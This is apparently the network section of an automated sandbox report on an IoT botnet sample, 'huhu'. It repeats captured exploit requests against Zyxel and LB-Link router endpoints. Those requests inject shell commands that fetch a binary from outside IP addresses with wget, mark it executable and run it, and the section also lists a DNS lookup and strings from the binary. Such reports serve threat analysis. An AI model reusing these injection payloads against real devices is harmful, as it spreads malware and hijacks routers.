            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: huhu.arm7.elfString found in binary or memory: http://103.245.236.146/huhu.mips;$
            Source: huhu.arm7.elfString found in binary or memory: http://45.142.182.123/huhu.mpsl;
            Source: huhu.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: huhu.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
